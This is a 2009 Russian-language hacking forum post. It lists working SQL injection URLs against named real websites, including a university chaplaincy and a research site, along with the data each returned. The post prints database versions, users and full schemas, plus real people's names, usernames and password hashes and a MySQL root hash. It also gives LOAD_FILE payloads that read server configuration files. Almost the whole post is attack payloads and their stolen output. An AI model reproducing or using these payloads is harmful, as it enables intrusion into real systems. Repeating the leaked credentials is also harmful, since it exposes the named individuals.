Показать сообщение отдельно

  #4  
Старый 13.03.2009, 20:47
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

тИЦ = 325
PageRank = 8


Код:
http://www.bath.ac.uk/robots.txt


Цитата:
http://www.bath.ac.uk/chaplaincy/people/profile.php?id=889087987654434+union+select+1,conc at_ws(0x3a,version(),user(),database()),3,4,5,6,7--

Database Version: 5.0.51b-log
Database name: CHAPLAINCY
User name: chaplaincyuser@snoopy.bath.ac.uk


Пользователи:

Цитата:
http://www.bath.ac.uk/chaplaincy/people/profile.php?id=889087987654434+UNION+SELECT+1,AES_ DECRYPT(AES_ENCRYPT(CONCAT(0x3a,(SELECT+CONCAT(id, 0x3a,name,0x3a,username,0x3a,password)+FROM+CHAPLA INCY.login+LIMIT+1,1),0x3a),0x71),0x71),3,4,5,6,7--


3 : Tim Wakeling : tjw : fa2b488a77e9c067c5b66b7404943ebb
4 : Mother Sarah : mcs : 2cf11729b85d817ea9de30d9c0d90066
6 : Angela Berners-Wilson : adxab : 8e9b1d3d7b6445bc93dbd769de2fa511



База:


Код:
Database [CHAPLAINCY]
    Table [ann  ( Rows)]
        id
        startdate
        enddate
        announcement
    Table [churchareas  ( Rows)]
        areanumber
        areaname
        areadescription
    Table [churches  ( Rows)]
        id
        churchname
        denomination
        tradition
        churchaddress
        postcode
        area
        ministernames
        contactphone
        contactemail
        churchwebsite
        churchdescription
        servicedetails
        eveningservice
        busroutes
        nearsundaybus
        studentmembers
        otherinfo
    Table [faithsocs  ( Rows)]
        id
        name
        fullname
        description
        emailcontact1
        emailaddress1
        emailcontact2
        emailaddress2
        website
    Table [features  ( Rows)]
        id
        dateadded
        title
        descriptionfirst
        descriptionrest
        article
        author
        filename
    Table [help  ( Rows)]
        id
        sort
        title
        content
    Table [hometexts  ( Rows)]
        id
        setname
        welcometitle
        welcomemessage
        section1
        section2
        section3
        section4
        section5
        section6
        thought
        thoughtby
    Table [info  ( Rows)]
        id
        title
        description
        article
        filename
        invisible
    Table [links  ( Rows)]
        id
        title
        url
        description
        category
    Table [login  ( Rows)]
        id
        name
        username
        password
    Table [people  ( Rows)]
        id
        name
        filename
        role
        email
        website
        profile
    Table [photogalleries  ( Rows)]
        id
        dateadded
        datemodified
        galleryname
        galleryfilename
        gallerysize
        gallerydate
        description
        icon
    Table [photos  ( Rows)]
        id
        galleryid
        orderingallery
        caption
    Table [polls  ( Rows)]
        pollid
        dateposted
        question
        response1
        votesfor1
        response2
        votesfor2
        response3
        votesfor3
        response4
        votesfor4
        response5
        votesfor5
    Table [settings  ( Rows)]
        holiday
        pollsvisible
        eventsonhomepage
    Table [specialevents  ( Rows)]
        id
        startdate
        enddate
        starttime
        endtime
        title
        description
    Table [weeklyevents  ( Rows)]
        id
        day
        start
        end
        description
        allyear





PageRank = 5


Цитата:
http://microarray.csc.mrc.ac.uk//news_item.html?id=55556444444+UNION+SELECT+AES_DEC RYPT(AES_ENCRYPT(CONCAT(0x3a,Version(),0x3a,Databa se(),0x3a,User(),0x3a),0x71),0x71),2,3,4,5,6,7,8,9 ,10,11,12-- &name=High%20Sequencing%20Form

Database Version: 5.0.18-nt
Database name: mac_admin
User name: root@localhost




Цитата:
http://microarray.csc.mrc.ac.uk//news_item.html?id=55556444444+UNION+SELECT+AES_DEC RYPT(AES_ENCRYPT(CONCAT(0x3a,user,0x3a,password,0x 3a),0x71),0x71),2,3,4,5,6,7,8,9,10,11,12+from+mysq l.user--

root : *629F73D84581DE883641DF5DC165597AD9ED9D43



Читаем c:\Program Files\Apache Group\Apache2\conf\httpd.conf

Цитата:
http://microarray.csc.mrc.ac.uk//news_item.html?id=55556444444+UNION+SELECT+AES_DEC RYPT(AES_ENCRYPT(CONCAT(0x3a,LOAD_FILE(0x633A5C507 26F6772616D2046696C65735C4170616368652047726F75705 C417061636865325C636F6E665C68747470642E636F6E66),0 x3a),0x71),0x71),2,3,4,5,6,7,8,9,10,11,12-- &name=High%20Sequencing%20Form

Читаем c:\Program Files\Apache Group\Apache2\htdocs\section.html

Цитата:
http://microarray.csc.mrc.ac.uk//news_item.html?id=55556444444+UNION+SELECT+AES_DEC RYPT(AES_ENCRYPT(CONCAT(0x3a,LOAD_FILE(0x633A5C507 26F6772616D2046696C65735C4170616368652047726F75705 C417061636865325C6874646F63735C73656374696F6E2E687 46D6C),0x3a),0x71),0x71),2,3,4,5,6,7,8,9,10,11,12-- &name=High%20Sequencing%20Form

И уже от них пляшем......



Цитата:
http://www.red2black.org.uk/videos.php?id=798665434347987+union+select+1,conca t_ws(0x3a,version(),user(),database()),3,4,5,6,7,8--
Database Version: 5.0.67-community
Database name: red2blac_cms
User name: red2blac_cms@localhost


Цитата:
http://www.thefixuk.co.uk/events/people.php?id=899890798768765434+union+select+1,co ncat_ws(0x3a,version(),user(),database()),3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19--
Version:4.0.27-max-log
User:dbo252263493@212.227.66.241
Database:db252263493




Цитата:
http://www.forklift-attachments.co.uk/product_detail.php?store_cat_id=132&prod_id=798369 877457986+union+select+1,2,3,4,concat_ws(0x3a,vers ion(),user(),database()),6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48, 49--
Version:4.1.22
User:con_user@localhost
Database:con001

Последний раз редактировалось spherics; 13.03.2009 в 22:05..
 
Ответить с цитированием